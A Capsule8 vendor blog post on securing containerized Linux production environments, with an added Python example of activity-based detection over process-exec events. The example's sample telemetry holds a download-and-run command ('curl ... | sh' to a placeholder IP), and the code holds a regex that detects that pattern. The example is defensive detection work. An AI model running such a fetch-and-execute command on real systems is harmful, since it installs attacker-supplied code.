Microservices and the increasing popularity of service-based architecture have catapulted Linux from the coder's tinker toy of yesterday to the most popular platform on the planet today. It's no wonder that modern Linux is fast becoming the de facto operating system of production environments and powering the "software is eating the world" phenomenon. It is simple, open and easy to integrate with, and it has become extremely stable in its modern state. Perhaps most importantly, open source enables the quick and easy deployment of multiple platforms across multiple clouds to serve multiple business channels. In fact, users can go from a mobile device to the cloud without ever touching any physical infrastructure within their own environment.
Meanwhile, container technology is further accelerating this drive, as DevOps push their standard data formats to the cloud. Container technology enables instant scalability and improves collaboration between development and operations teams. This next generation platform approach enables developers to build, host, store and deploy applications or websites on a highly scalable production infrastructure for web, mobile and backend solutions. Of course, this makes securing the production environment more critical than ever.
The New Cyber Security Gotcha
But as with most good things, there’s a catch. While the simple plug-and-play nature of next-generation infrastructure and modern production environments ensures that no one is left behind in the age of microservices, security in this brave new world just might be the fly in the ointment. This modular approach to delivery and infrastructure, which spans multiple clouds across various modern production environments, brings with it borderless networks as well as a different set of risks and vulnerabilities than those associated with more traditional approaches.
Current Solutions Fail in Modern Production Environments
The overarching problem is that too many cyber practitioners are applying five-year-old security models to this newly evolving and transformative technology. There are three main reasons existing tools are inadequate in modern settings:
- Traditional security appliances rely on a stable, unique IP address to identify each asset they are charged with protecting. Containers are short-lived, their addresses are recycled as they come and go, and many containers on one host can share that host's address, so an IP address no longer identifies an asset.
- Traffic between containers on the same host stays inside the host's virtual network and never crosses a physical network segment where an out-of-band appliance could tap it, thereby removing a vital source of detection data.
- End-to-end encryption is becoming more prevalent, and TLS 1.3 makes forward-secret key exchange mandatory, so an out-of-band appliance that holds only the server's private key can no longer passively decrypt the traffic copied to it.
Further, in the world of Windows, the easiest way for an attacker to persist is to leave behind malicious executables, which is where most Windows security focuses. Linux executables are far less portable, and their runtime environments are vastly less predictable, so binaries are often built on the very system they run on. Linux also ships so many small, universal tools that an attacker doesn't need to leave much behind, often just shell scripts that drive tools already present on the host. So the old approach of detecting bad executables no longer suffices.
The current technological shift toward modern production environments and cloud-based infrastructure brings unprecedented opportunity, but also raises new questions that every organization must answer about their current and future security practices. For example, where does an appliance fit in? Do we really want a heavyweight virtual appliance that might cause new bottlenecks? How much more would it cost to split off traffic for an out-of-band appliance in the cloud? And if appliances provide less visibility, does that mean more clean-up costs?
A New Approach Is Critical
Capsule8 is developing the first threat prevention and response platform that's purpose-built for cloud-native infrastructures. Our approach is to protect an organization's assets across networks, systems, containers, bare metal, and clouds by addressing the diverse and complex nature of modern next-gen platform architecture and microservices. We believe the best approach is to look beyond traditional detection methods and instead focus on activity. By detecting the effect of an intrusion, security operations teams will be freed of the burden of monitoring for signatures or intrusions themselves and instead be able to focus on detecting and shutting down attacks in the instant they happen.
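To make the "focus on activity rather than executables" point above concrete (and the earlier point that a Linux attacker may leave behind nothing but a shell script), here is an added illustration of activity-based detection over process-execution events. It is example code written for this page, not Capsule8's product or sensor. The event format, the sample events and the two rules are constructed for the example: a real deployment would feed exec records from the audit subsystem or an in-kernel tracer, and the list of daemons that should never spawn a shell is a hypothetical policy. Note that events are keyed on the container ID rather than an IP address, for the reasons given in the bullet list.

```python
"""Activity-based detection over process-exec events (added example, not Capsule8 code)."""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class ExecEvent:
    container: str   # container ID: a stable asset identifier, unlike a recycled IP
    pid: int
    ppid: int
    comm: str        # executable name as the kernel reports it
    argv: List[str]
    uid: int


# Constructed sample telemetry (not captured from a real system). In the web
# container an nginx worker spawns a shell that downloads a script and pipes it
# straight into another shell: no new executable is ever written to disk, so a
# file-based scanner has nothing to look at. The db container is benign.
SAMPLE_EVENTS = [
    ExecEvent("web-7f3a", 100, 1, "nginx", ["nginx", "-g", "daemon off;"], 0),
    ExecEvent("web-7f3a", 101, 100, "nginx", ["nginx: worker process"], 33),
    ExecEvent("web-7f3a", 250, 101, "sh",
              ["sh", "-c", "curl -s http://203.0.113.7/x | sh"], 33),
    ExecEvent("web-7f3a", 251, 250, "curl", ["curl", "-s", "http://203.0.113.7/x"], 33),
    ExecEvent("web-7f3a", 252, 250, "sh", ["sh"], 33),
    ExecEvent("db-19c2", 300, 1, "postgres", ["postgres"], 70),
    ExecEvent("db-19c2", 301, 300, "postgres", ["postgres: checkpointer"], 70),
]

SHELLS = {"sh", "bash", "dash", "ash", "zsh"}
# Hypothetical policy: these server processes never legitimately spawn a shell
# in production, so a shell child is an effect worth alerting on regardless of
# which binary (if any) the attacker brought with them.
NO_SHELL_PARENTS = {"nginx", "httpd", "node", "postgres", "java"}
# "download something and pipe it into a shell": the classic no-artifact loader.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash|dash)\b")


def index_events(events: List[ExecEvent]) -> Dict[Tuple[str, int], ExecEvent]:
    """Key events by (container, pid); pids are only unique within a container."""
    return {(e.container, e.pid): e for e in events}


def lineage(index: Dict[Tuple[str, int], ExecEvent], container: str, pid: int) -> List[str]:
    """Walk parent links back to the root we know about; root-first list of comm names."""
    chain: List[str] = []
    key = (container, pid)
    seen = set()
    while key in index and key not in seen:   # 'seen' guards against pid reuse loops
        seen.add(key)
        event = index[key]
        chain.append(event.comm)
        key = (container, event.ppid)
    return list(reversed(chain))


def detect(events: List[ExecEvent]) -> List[dict]:
    """Return one alert dict per rule hit, carrying the process lineage for triage."""
    index = index_events(events)
    alerts: List[dict] = []
    for e in events:
        parent = index.get((e.container, e.ppid))
        if e.comm in SHELLS and parent is not None and parent.comm in NO_SHELL_PARENTS:
            alerts.append({
                "rule": "shell_from_server_process",
                "container": e.container, "pid": e.pid, "uid": e.uid,
                "lineage": lineage(index, e.container, e.pid),
            })
        if e.comm in SHELLS and len(e.argv) >= 3 and e.argv[1] == "-c" \
                and PIPE_TO_SHELL.search(e.argv[2]):
            alerts.append({
                "rule": "download_piped_to_shell",
                "container": e.container, "pid": e.pid, "uid": e.uid,
                "command": e.argv[2],
                "lineage": lineage(index, e.container, e.pid),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Both rules fire on the same event (pid 250) and neither depends on a hash, a filename or an IP address: the signal is what the process did and who its parent was. The lineage list ("nginx" → "nginx" → "sh") is what an analyst needs first when deciding whether to freeze and replace the workload.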
This approach will provide real-time, container-aware visibility and prevention across clusters. By focusing on the impact, Capsule8 will also provide automated attack resilience via real-time forensics and recovery, so that any piece of code that comes under attack in a stateless workload can be instantly frozen and replaced. With an API-first approach, Capsule8 is developing a single distributed engine for all rules and analysis that is open, flexible, extensible, and extremely simple to integrate.
Empowering the Digital Transformation
While these features are impressive and critical to navigating the modern Linux production environment in a safe manner, they would be of little use without automation. Capsule8 is working to enable “self-driving defense.” Just like self-driving cars manage the boring parts of driving, while you relax, Capsule8’s solution will elastically scale to your environment and team – just like containers – while eliminating alert fatigue and managing the easy parts of the drive on its own. This will enable security analysts to focus on the unknown twisty mountain roads rather than trance-inducing stretches of well-travelled highway.
Until now, such production security has been a pipe dream, available only to major players like Facebook and Google, who have the resources to build their own security into their own production environments and deploy it as they see fit. Capsule8 will level the playing field by offering full production environment security to any organization looking to modernize.